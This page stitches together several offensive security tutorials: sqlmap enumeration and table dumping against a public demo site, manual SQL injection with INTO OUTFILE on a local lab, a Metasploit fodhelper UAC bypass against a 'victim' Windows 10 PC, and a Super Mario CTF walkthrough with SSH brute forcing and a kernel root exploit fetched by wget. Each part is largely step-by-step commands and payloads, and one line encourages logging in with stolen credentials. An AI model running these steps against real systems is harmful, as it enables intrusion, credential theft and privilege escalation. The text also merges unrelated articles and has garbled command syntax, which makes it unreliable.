Database Penetration Testing using Sqlmap (Part 1)

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

·         Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.

·         Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.

·         Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.

·         Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.

·         Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.

·         Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.

·         Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.

·         Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

·         Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

·         Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.

·         Support for database process' user privilege escalation via Metasploit'sMeterpretergetsystem command.

These options can be used to enumerate the back-end database management system information, structure and data contained in the tables.

Sometimes you visit such websites that let you to select product item through their picture gallery if you observer its URL you will notice that product item is call through its product-ID numbers.

Let’s take an example

http://testphp.vulnweb.com/artists.php?artist=1

So when attacker visits such kind of website he always checks for SQL vulnerability inside web server for lunching SQL attack.

 Let’s check how attacker verifies SQL vulnerability.

Attacker will try to break the query in order to order to get error message, if he successfully received error message then it confirms that web server is SQL injection affected.

http://testphp.vulnweb.com/artists.php?artist=1’

From screenshot you can see we have received error message successfully now we have make SQL attack on web server so that we can fetch database information.

Databases

For database penetration testing we always choose SQLMAP, this tool is very helpful for beginners who are unable to retrieve database information manually or unaware from SQL injection techniques.

Open the terminal in your Kali Linux and type following command which start SQL injection attack on the targeted website.  

Sqlmap –u “http://testphp.vulnweb.com/artists.php?artist=1” –dbs –batch

-u:  target URL

--dbs: fetch database name

--batch: This will leave sqlmap to go with default behavior whenever user's input would be required

Here from given screenshot you can see we have successfully retrieve database name “acuart”

Tables

As we know a database is a set of record which consist of multiple table inside it therefore now use another command in order to fetch entire table names from inside the database system.

Sqlmap –u “http://testphp.vulnweb.com/artists.php?artist=1” –D acuart –table –batch

-D: DBMS database to enumerate (fetched database name)

--tables: enumerate DBMS database table

As a result given in screenshot we have enumerated entire table name of database system. There are 8 tables inside database “acuart” as following:

T1: artists

T2: carts

T3: categ

T4: featured

T5: guestbook

T6: pictures

T7: products

T8: users

Columns

Now further we will try to enumerate column name of desired table. Since we know there is a users table inside the database acuart and we want to know the all column names of users table therefore we will generate another command for column captions enumeration.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns –batch

-T: DBMS table to enumerate (fetched table name)

--columns: enumerate DBMS database columns

Get data from a table

Slowly and gradually we have penetrated much details of database but last and most important step is to retrieve information from inside the columns of a table. Hence at last we will generate a command which will dump information of users table.

 sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump –batch

--dump: dump all information of DBMS database

Here from given screenshot you can see it has dump entire information of table users, mainly users table contains login credential of other users. You can use these credential for login into server on behalf other users.

Dump All

Last command is the most powerful command in sqlmap which will save your time in database penetration testing; this command will perform all the above functions at once and dump entire database information including table names, column and etc.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart –dump-all –batch

This will give you all information at once which contains database name as well as table’s records.

Try it yourself!!!

Dumping Database using Outfile

In our previous  article you have learned the basic concepts of SQL injection but in some scenarios you will find that your basic knowledge and tricks will fail. Today we are going to perform SELECT...INTO OUTFILE statement is easiest way of exporting a table records into a text file or excel file

This statement allows user to load table information very rapidly to a text file on the server machine. SELECT ... INTO OUTFILE writes the significant rows to a file, and gives authority to the use of column and row terminators to specify output format. The output file is created directly by the MySQL server, so the filename with path should be specify where user want the file to be written on the server host. The file must not exist already on server. It cannot be overwritten. A user requires the FILE privilege to run this statement.

Let’s start!!

Lesson 7

Open the browser and type following SQL query in URL

http://localhost:81/sqli/Less-7/?id=1

From screenshot you can read “you are in….. Use outfile” now let’s try to break this statement.

OKAY! The Query has been broken successfully we receive the error message when we had used single quote (‘) in order to break query hence it confirms that it is vulnerable.

http://localhost:81/sqli/Less-7/?id=1’

After making lots of efforts finally successfully the query gets fixed, if noticed the step for SQL injection is similar as previous chapter only techniques to fix the query is different.

http://localhost:81/sqli/Less-7/?id=1’))    --+

Now following query will dump the result into a text file. Here you need to mention the path where user wants the file to be written on the server host. The file must not exist already on server user always use new text file for over writing database information.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,3 into outfile "/xampp/htdocs/sqli/Less-7/hack1.txt" --+

From screenshot you can perceive that still it is showing error message now open another tab for the output of resultant query.

http://localhost:81/sqli/Less-7/

Now add file name hack1.txt to check output of above query.

http://localhost:81/sqli/Less-7/hack1.txt

hence you can see we get output of executed query inside text file. This will save hack1.txt file inside the server machine also.

Execute following query to retrieve database name using union injection using a new text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,database() into outfile "/xampp/htdocs/sqli/Less-7/hack2.txt" --+

http://localhost:81/sqli/Less-7/hack2.txt

Hence you can see we have successfully get security as database name as result.

Next query will provide entire table names saved inside the database using another text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile "/xampp/htdocs/sqli/Less-7/hack3.txt" --+

http://localhost:81/sqli/Less-7/hack3.txt

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' into outfile "/xampp/htdocs/sqli/Less-7/hack4.txt" --+

http://localhost:81/sqli/Less-7/hack4.txt

Hence you can see it contains so many columns inside it I had chosen only two columns for further enumeration.

C1: username

C2: password

At last execute following query to read all username and password inside the table users from inside its column.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(username),group_concat(password)from users into outfile "/xampp/htdocs/sqli/Less-7/hack5.txt" --+

http://localhost:81/sqli/Less-7/hack5.txt

From screenshot you can read the username and password save inside text file.

Note: you can try same attack using excel file; attacker only need to change hack1.txt into hack1.csv which will save the output into excel file.

Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key)

Hello friends! Today we are going to share new article related to how to bypass window 10 UAC once you have hacked the victim’s system. In metasploit a new module has been added to achieve admin access in window 10s.

Attacker: kali Linux

Target: window 10

This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

Use exploit/windows/local/bypassuac_fodhelper

msf exploit(bypassuac_fodhelper) >set session 1

msf exploit(bypassuac_fodhelper) >exploit

Hence you can see another meterpreter session 2 opened which means we successfully exploited the target once again now let’s check user privilege.

Meterpreter > get system

Awesome!!!! We got admin privilege successfully.

Hack the Super Mario (CTF Challenge)

Hello friends!! Might you people have played THE SUPER MARIO game once in your childhood and no wonder if a thought have been strike in your mind to hack the game. So whatever you had thought today we are going to make it true and for that you guys need to download the new VM machine for super Mario from here.

The credit for developing this VM machine is goes to Mr_h4sh who has hide 2 flag inside this lab as a challenge for hackers. The level of the challenge is Intermediate.

Let’s breach!!!

As you know we always start with enumeration, therefore open the terminal in your kali Linux and go for aggressive scan with nmap.

Nmap –p- -A 192.168.0.5

Since port 22 and port 8180 for service SSH and HTTP respectively therefore I choose port 8081 for enumeration but from screenshot you can see I didn’t get any remarkable result.

Dirb http://192.168.0.5:8180

Then I move for directory brute force attack using following command

Dirb http://192.168.0.5:8180 /usr/share/wordlists/dirb/big.txt

In the given below screenshot you can read it has shown a file name vhosts, let’s explore it through browser.

Now explore vhost in URL as  http://192.168.0.5:8180/vhosts here vhosts stand for virtual host it is method for hosting multiple domain on a single server. From inside Vhosts I came know the Server Name is mario.supermariohost.local  

Let’s add mario.supermariohost.local into /etc as new localhost

Cd etc

Vim hosts

Now type “192.168.0.5 mario.supermariohost.local” inside the vim editor to add it in the /etc/host and after then type wq to save it.

Now Type Cat hosts to check added host name Hence you from screenshot you can see it has been had added inside it successfully.

Then I visit mario.supermariohost.local on browser and finally got Mario as browser game but it is not working.

Since we know port 22 and 8081 was open and we didn’t get much information from enumeration of port 8081. Now we will move towards port 22 for SSH enumeration therefore I had prepared a dictionary in order to retrieve credential to login inside SSH server. 

Dictionary contains username which was the famous character of MARIO, you can check these name from Google also.

Inside text editor type following name: Mario; luigi; peach; toad; yoshi and save file as user on desktop.

Use john the ripper to generate dictionary of password using following command here –rules will enable the wordlist and --stdout will define a fix length of password to be generate on the desktop as pass.

John –wordlist : user –rules –stdout > pass

Finally we have username dictionary as user and password dictionary generated by john as pass, now we have to match perfect combination of user and pass in order to retrieve credential for SSH login. I had chosen hydra for password cracking, you can choose any other password cracking tool also.

Hydra –L user –P pass 192.168.0.5 ssh

From the given screenshot you read the matched combination of username: luigi and password: luigi1 for SSH server.

Now type following for SSH login

Ssh luigi@192.168.0.5

Password luigi1

Yeeppiii!!!!  Finally we have login inside SSH server.

Uname –a

Here we come to know that the version for linux  supermariohost 3.13.0; let’s checkout its exploit on Google.

Yes, there is an exploit for 3.13.0 overlayfs local root in ubuntu , download it from here inside your kali Linux.

Form screenshot you can see I have downloaded the exploit as Mario.c for privilege escalation. 

Now type following command for downloading Mario.c inside target system.

Wget http://192.168.0.6/mario.c

The file is successfully downloaded inside it now type another command to compile Mario.c

Gcc Mario.c –o mario

./Mario

Id

Cd/root

Ls

Awesome!!! We have got root privilege and from screenshot you can see inside its directory I have got zip file as flag.zip

Now type following command to download flag.zip on the desktop of your kali Linux

Scp /root/flag.zip root@192.168.0.6:/root/Desktop

Fcrackzip flag.zip –D –P /user/share/wordlist/rockyou.txt -u
As shown in given screenshot PASSWORD FOUND!!! : pw ==ilovepeach; now you can unzip your file using this password.

Unzip flag.zip

It will ask for password, give above password to unzip it and again if you notice the given image it contains flag.txt

Cat flag.txt

1^st FLAG: Well done: D If you reached this it means you got root, congratulations.

Now follow the given below step in order to complete another challenge.

Iptables –L

Here from screenshot you can see a new network has been added on remote system.

Arp –n

Now the target system has been forwarded on a new IP 192.168.122.112

Ls -la

Found a directory .bak

Cd /.bak

Ls

Cd users

Cd luigi

Ls

There are two files inside it let’s read them one by one

Cat message

Hi Luigi,

Since you've been messing around with my host, at this point I want to return the favour.

This is a "war", you "naughty" boy!

Cat id_rsa.pub

The highlighted word in the given text may appear like a username for login into SSH server.

Let ensure by login into ssh -i id_rsa warluigi@192.168.1.122.112

Great!! All assumption had given positive result

Again check for kernel version

Uname -a

Woooww!! It is same version now we can use our Mario.c exploit for root privilege. Hence repeat the above step as shown in images.

Wget http://192.168.0.6/maio.c

The file is successfully downloaded inside it now type another command to compile Mario.c

Gcc Mario.c –o Mario

./Mario

Id

Cd /root

Ls –la

Here I found two important files 1^st hint.txt 2^nd flag2.zip before going for unzip flag.zip we must look towards hint.txt file.

Cat .hint.txt

“Peach Loves Me” it might be the password key for decrypting the flag2.zip file 

Now let download fla2g.zip on the desktop of kali Linux by using following again

Scp /root/flag2.zip root@192.168.0.6:/root/Desktop

Unzip flag2.zip

Now when it will ask for password key type “Peach Loves Me”

It contains flag2.txt inside type cat flag2.txt to open this file.

2^nd FLAG: Congratulations on your second flag!

  

Wonderful!!! We have caught both flags